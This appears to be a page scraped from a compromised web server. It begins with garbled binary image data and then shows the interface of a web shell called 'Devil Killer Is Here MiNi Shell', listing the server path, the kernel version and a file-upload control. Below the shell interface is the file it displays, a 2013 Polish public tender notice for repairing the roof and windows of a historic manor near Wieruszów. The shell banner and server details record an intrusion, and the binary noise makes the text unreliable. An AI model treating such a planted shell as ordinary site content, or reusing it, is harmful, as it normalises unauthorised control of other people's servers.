JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130717/280308-N-2013.html

<p class="kh_header"><b>Łódź: Wykonanie  remontu,  obejmującego  wymianę  pokrycia  dachu  oraz  wymianę  części  zabytkowej  stolarki  okiennej  (13 szt.),  w  budynku  mieszkalnym  Nr 13  DWORKU  (wpisanym  do  ewidencji  zabytków  województwa  łódzkiego),  usytuowanym  w  miejscowości  Nawrotów - Teklinów,  gm. Wieruszów,  na  działce  nr  ew. 129/2,  należącym  do  Zasobu  Mieszkaniowego  Własności  Rolnej  Skarbu  Państwa</b><br>
<b>Numer ogłoszenia: 280308 - 2013; data zamieszczenia: 17.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi , ul. Północna 27/29, 91-420 Łódź, woj. łódzkie, tel. 042 636 53 26, faks 042 632 9133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  remontu,  obejmującego  wymianę  pokrycia  dachu  oraz  wymianę  części  zabytkowej  stolarki  okiennej  (13 szt.),  w  budynku  mieszkalnym  Nr 13  DWORKU  (wpisanym  do  ewidencji  zabytków  województwa  łódzkiego),  usytuowanym  w  miejscowości  Nawrotów - Teklinów,  gm. Wieruszów,  na  działce  nr  ew. 129/2,  należącym  do  Zasobu  Mieszkaniowego  Własności  Rolnej  Skarbu  Państwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:
Remont  dachu  budynku  oraz  stolarki  okiennej  zostanie  wykonany  na  podstawie  sporządzonego  projektu  budowlanego  remontu  budynku  mieszkalnego  oraz  prawomocnej  Decyzji  Nr 10/2011  z  dnia  13.01.2011r.  o  pozwoleniu  na  budowę,  wydanej  przez  Starostę  Wieruszowskiego.
Projekt  został  również  zaopiniowany  przez  Wojewódzkiego  Konserwatora  Zabytków  w  Łodzi,  Delegatura  w  Sieradzu.
Przewidywane  roboty  obejmują  część  robót  ujętych  w  w/w  opracowaniu  projektowym,  w  zakresie  dotyczącym  wymiany  pokrycia  dachu  oraz  wymiany  13 szt.  okien  w  lokalach  mieszkalnych  na  parterze.
Dane  ogólne:
Przedmiotowy  obiekt  to  dworek  powstały  w  połowie  XIX wieku,  wpisany  do  ewidencji  zabytków  województwa  łódzkiego.
Jest  to  budynek  murowany  z  cegły  ceramicznej,  otynkowany  wykończony  prostym  gzymsem  międzykondygnacyjnym.  Bryła  budynku  posiada  nieregularny  kształt.  W  części  północnej  i  południowej  budynek  jest  piętrowy,  natomiast  w  części  środkowej - parterowy,  z  poddaszem.
Budynek  wybudowany  jest  na  planie  prostokąta  o  wymiarach  11,60m x 27,10m,  z  wysuniętym  w  osi  fasady  budynku  gankiem,  stanowiącym  główne  wejście  do  budynku.
Górną  powierzchnię  ganku  stanowi  taras,  dostępny  z  lokalu  mieszkalnego  na  piętrze.
Ponad  gankiem  znajduje  się  ryzalit  z  zaokrąglonymi  narożnikami,  wyniesiony  ponad  połać  dachu.
Budynek  posiada  trzyczęściowy  dach  o  drewnianych  konstrukcjach  dwuspadowych,  z  pokryciem  blachą  płaską,  ocynkowaną.
Stropy  międzykondygnacyjne  żelbetowe,  powierzchnie  ścian  budynku  wykończone  są  tynkiem  cementowo-wapiennym,  stolarka  okienna  i  drzwiowa  drewniana.
Budynek  wyposażony  jest  w  przyłącze  do  sieci  elektrycznej,  instalację  wodną  z  lokalnej  hydroforni  oraz  instalację  kanalizacyjną,  odprowadzoną  do  szczelnych  zbiorników  bezodpływowych.  Każdy  lokal  posiada  osobne  ogrzewanie  piecami  węglowymi.  Jeden  z  lokali  na  parterze  posiada  instalację  CO,  zasilaną  z  pieca  węglowego.
Zestawienie  powierzchni  budynku  mieszkalnego:
- pow.  zabudowy = 318,60 m2			- pow.  użytkowa = 455,00 m2
- pow. gospodarcza = 79,40 m2			- kubatura = 1492,90 m3
Zakres przedmiotu zamówienia
ZAKRES  PRZEWIDYWANYCH  ROBÓT  remontu  budynku  obejmuje  wymianę  części  stolarki  okiennej  oraz  wymianę  pokrycia  dachu.
 I. Opis  techniczny  remontu  dachu  budynku  mieszkalnego  Dworku
Istniejące  pokrycie  dachowe  z  blachy  podlega  wymianie.
Roboty  obejmują  rozebranie  pokrycia  dachu,  rynien  i  części  rur  spustowych,  nie  nadających  się  do  użytku.
Pokrycie  dachu  należy  wykonać  z  blachy  stalowej,  cynkowo - tytanowej,  płaskiej.  Łączenie  płatów  blachy  metodą  na  rąbek.  Rozstaw  rąbka  prostopadłego  do  okapu  wynosi  80 cm.
Należy  naprawić  pasy  pod-  i  nadrynnowe,  uzupełnić  lub  wymienić  uszkodzone  obróbki  blacharskie,  rynny  i  rury  spustowe  na  całym  dachu  budynku.  Zachować  miejsca  usytuowania  rur  spustowych  oraz  ich  średnice.
Doszczelnić  silikonem  dachowym  miejsca  wokół  kołków  kotwiących  blachy  osłonowe.  Uzupełnić  brakujące  deski  podbitki  dachowej  i  wiatrownic.
Sprawdzić  i  uzupełnić  połączenia  instalacji  odgromowej.
Należy  wykonać  obróbki  blacharskie  (szczególnie  w  stykach  ze  ścianami  kominów  i  ścianami  wyższych  części  budynku).
Należy  wykonać  obróbki  oraz  uszczelnienie  połączeń  kominów  z  połacią  dachu  wraz  z  opierzeniami,  rynnami  i  rurami  spustowymi.
Naprawić  lub  wymienić  obróbki  blacharskie  wzdłuż  ścian.
Sprawdzić  i  usunąć  ewentualne  nieszczelności  gzymsów  w  częściach  dachu.
W  części  poddasza  na  klatce  schodowej  przy  oknie  dachowym,  wewnątrz  budynku,  należy  wymienić  wykończenie  ścian  wewnętrznych  i  stropu,  ze  względu  na  liczne  spękania  i  wybrzuszenia,  spowodowane  prawdopodobnie  znacznym  zawilgoceniem  na  skutek  wpływu  czynników  atmosferycznych  spowodowanych  nieszczelnościami  pokrycia  dachu.
Podobne  uszkodzenia  występują  również  w  sąsiedztwie  dwóch  okien,  zamontowanych  w  połaci  dachowej,  usytuowanych  w  pomieszczeniach  kuchni  w  lokalach  mieszkalnych  na  poddaszu,  od  strony  wschodniej  budynku.
Należy  rozebrać  fragmenty  wykończenia  stropodachu  w  sąsiedztwie  okien  ponad  spocznikiem  w  klatce  schodowej  na  I-ym  piętrze  oraz  w  lokalach  mieszkalnych  na  poddaszu  użytkowym,  sprawdzić  stan  techniczny  krokwi  oraz  wykonać  stosowne  wzmocnienia  lub  wymianę  odcinków  krokwi.
Elementy,  które  zostały  w  całości  zniszczone  (w  okolicy  okien  dachowych)  należy  wymienić  i  zastąpić  nowymi  elementami  o  tym  samym  przekroju  i  kształcie.
Wszystkie  elementy  drewniane  dachu  należy  zabezpieczyć  preparatami  impregnacyjno - owado - grzybobójczymi.
Uzupełnić  deskowanie  sufitów,  otynkować  i  pomalować  farbą  emulsyjną,  białą.
II. Opis  techniczny  remontu  stolarki  okiennej  w  budynku  mieszkalnym  Nr 13  DWORKU usytuowanym  w  miejscowości  Nawrotów-Teklinów,  gm. Wieruszów  (działka  nr  ew.  129/2).
Przewiduje  się  wymianę  13 szt. starej  stolarki  okiennej,  typu  skrzynkowego,  w  części  pomieszczeń  w  lokalach  mieszkalnych  usytuowanych  na  parterze  budynku.
Zgodnie  z  uzgodnieniami  z  Wojewódzkim  Konserwatorem  Zabytków  okna  podlegające  wymianie  powinny  być  wykonane  na  zamówienie,  jako  okna  drewniane,  zespolone,  z  ramą  okienną  o  gr. 10 cm,  odpowiadającej  głębokości  obecnie  istniejącej  ramy  skrzynkowej.
Należy  zachować  i  odtworzyć  istniejący  podział  i  kształt  skrzydeł  okiennych.
Szyby  w  dolnych  skrzydłach  okien  powinny  być  podzielone  na  dwie  części.
Stolarkę  należy  wykonać  z  drewna  zabezpieczonego  środkami chemicznymi  przed  korozją  biologiczną.
Malowanie  farbą  podkładową  oraz  nawierzchniową,  wodorozcieńczalną,  białą.
Należy  zastosować  skrzydła  rozwierane  z  szybami  zespolonymi,  podwójnymi,  o  współczynniku  przenikania  ciepła  nie  większym  niż  U = 1,1 W /m2K.
Prace  obejmują  demontaż  starej  stolarki  okiennej  i  parapetów  wewnętrznych,  a  następnie  montaż  ram  i  skrzydeł  okiennych  wraz  z  okuciami  i  klamkami,  parapetów  wewnętrznych  oraz  wykonanie  obróbek  murarskich  ościeży  okien,  z  zatarciem  na  gładko  i  pomalowaniem  farbą  emulsyjną,  białą.
Wymiary  okien  należy  dostosować  każdorazowo  do  indywidualnych  (istniejących)  uwarunkowań  lokali.
UWAGA:
Część  okien  w  lokalach  mieszkalnych  na  parterze  została  już  wymieniona.  Wykonywane  obecnie  okna  należy  dostosować  do  istniejących,  z  uwzględnieniem  wymiarów  futryn,  miejsc  usytuowania  ram  poprzecznych,  szerokości  ramiaków  skrzydeł,  rodzaju  klamek.
Zlecenie  obejmuje  również  wywiezienie  zdemontowanych  elementów  starej  stolarki,  a  także  wszelkich  powstałych  odpadów,  opakowań  i  gruzu  na  uprawnione  wysypisko,  wraz  z  uprzątnięciem  lokali  po  robotach  remontowych,  a  także  przekazaniem  Zamawiającemu  dokumentu  potwierdzającego  odbiór  odpadów.
Zastosowane  materiały  budowlane  oraz  elementy  prefabrykowane  powinny  posiadać  wymagane  atesty  lub  certyfikaty  techniczne  oraz  spełniać  zalecenia  normowe.
Wykonawca  zapewni,  aby  tymczasowo  składowane  materiały,  do  czasu  ich  wbudowania,  były  zabezpieczone  przed  zanieczyszczeniem,  zachowały  swoją  jakość  i  właściwości  oraz  były  dostępne  do  kontroli  przez  Inspektora  Nadzoru  Inwestorskiego.
Wszelkie  prace  remontowe  dachu  budynku  oraz  stolarki  okiennej  należy  prowadzić  zgodnie  z  projektem  budowlanym,  opisem  technicznym  oraz  przedmiarem  i  dokumentacją  techniczno - kosztorysową,  a  także  sztuką  budowlaną,  obowiązującymi  przepisami  BHP,  normami  budowlanymi,  zasadami  wiedzy  technicznej  dot. remontowanych  budynków  wykonanych  w  technologii  tradycyjnej.
Zgodnie  z  art. 20 ust. 1,  pkt 1b  ustawy  Prawo  budowlane  (Dz. U.  z  2006r. Nr 156,  poz. 1118  z  późn. zm.)  oraz  Rozporządzeniem  Ministra  Infrastruktury  z  dnia  23 czerwca 2003r.  w  sprawie  informacji  dotyczącej  bezpieczeństwa  i  ochrony  zdrowia  oraz  planu  bezpieczeństwa  i  ochrony  zdrowia  (Dz. U.  z 2003r.,  Nr 120,  poz. 1126)  do  opracowania  projektowego  została  dołączona  informacja  o  bezpieczeństwie  i  ochronie  zdrowia.  Kierownik  budowy  jest  obowiązany  sporządzić  Plan  BIOZ  dla  całości  realizowanych  robót.
Zastosowane  materiały  budowlane  oraz  elementy  prefabrykowane  powinny  posiadać  wymagane  atesty  techniczne.
Wszystkie  roboty  należy  wykonać  zgodnie  z  warunkami  technicznymi  wykonania  i  odbioru  robót  budowlanych  i  montażowych  określonymi  w  Specyfikacji  Technicznej  Wykonania  i  Odbioru  Robót.
Roboty  budowlane  należy  prowadzić  pod  kierunkiem  i  nadzorem  osób  posiadających  odpowiednie  przygotowanie  zawodowe,  stosowne  uprawnienia  oraz  doświadczenie  przy  wykonywaniu  remontów  oraz  wymiany  drewnianej  stolarki  okiennej  w  budynkach  zabytkowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.26.26.90-4, 45.26.10.00-4, 45.42.00.00-7, 45.42.10.00-4, 45.42.11.32-8, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium najpóźniej do upływu terminu składania ofert.Zamawiający ustala wadium w wysokości
6 500 zł (słownie: sześć tysięcy pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, oprócz oświadczenia w trybie art. 22 ust. 1 uPzp Zamawiający nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca posiada niezbędną wiedzę i doświadczenie, Wykonawca  oprócz oświadczenia w trybie art. 22 ust. 1 uPzp zobowiązany jest załączyć do oferty:a)wykaz wykonanych w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych tożsamych z przedmiotem zamówienia z podaniem ich rodzaju i wartości oraz daty i miejsca wykonania.
Wykonawca zobowiązany jest wykazać posiadanie doświadczenia w postaci co najmniej dwóch robót budowlanych tożsamych z przedmiotem zamówienia tj. robót ogólnobudowlanych  w  zabytkowych  budynkach  mieszkalnych  lub  innych,  o  wartości  min. 70.000,00 zł  każda.
wzór stanowi załącznik nr 6 do SIWZ
b)dowody potwierdzające bezspornie, że roboty budowlane, na których zrealizowanie Wykonawca powołuje się powyżej zostały wykonane w sposób należyty  oraz wskazujące czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Dowodami są:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie winno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia;
- W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, o którym mowa w ust. 4 li. a) zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej, a wymaganych przez Zamawiającego na potwierdzenie należytego wykonania.
Uwaga:
W postępowaniach wszczynanych w okresie 12 miesięcy od dnia wejścia w życie Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców oraz form w jakich te dokumenty mogą być składane (Dz. U 2013, poz. 231) wykonawca może przedkładać dokumenty potwierdzające należyte wykonanie robót budowlanych wg Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. Nr 226, poz. 1817). Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania potencjałem technicznym, oprócz oświadczenia w trybie art. 22 ust. 1 uPzp Zamawiający nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, oprócz oświadczenia w trybie art. 22 ust. 1 uPzp Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że: - dysponuje lub będzie dysponował co najmniej 1 osobą zdolną do wykonania przedmiotu zamówienia posiadającą stosowne uprawnienia do kierowania i nadzorowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, przynależącą do Izby Inżynierów Budownictwa oraz  1  osobą,  z  uprawnieniami  w  zakresie  konserwacji  zabytków  z  minimum  2-letnim  stażem,  wraz  z  informacją  o  podstawie  do  dysponowania  tymi  osobami - oświadczenie składane na formularzu załącznika nr 4 do SIWZ.
- osoba przewidziana do pełnienia funkcji kierownika robót remontowych posiada właściwe uprawnienia, które są niezbędne do realizacji przedmiotowego zamówienia oraz, że osoba z  uprawnieniami  w  zakresie  konserwacji  zabytków,  odbyła dwuletnią praktykę zawodową na budowie przy zabytkach nieruchomych - w informacji należy podać nazwę i lokalizację zabytku oraz termin odbytej praktyki -Wykonawca składa oświadczenie na własnym druku.
- dysponuje lub będzie dysponował co najmniej 3 osobami zdolnymi do wykonania prac o charakterze technicznym wraz z informacją o podstawie do dysponowania tymi osobami - oświadczenie składane na formularzu załącznika nr 4 do SIWZ. Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia - Wykonawca oprócz oświadczenia w trybie art. 22 ust. 1 uPzp winien załączyć do oferty:a)ważną i opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000 zł. Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

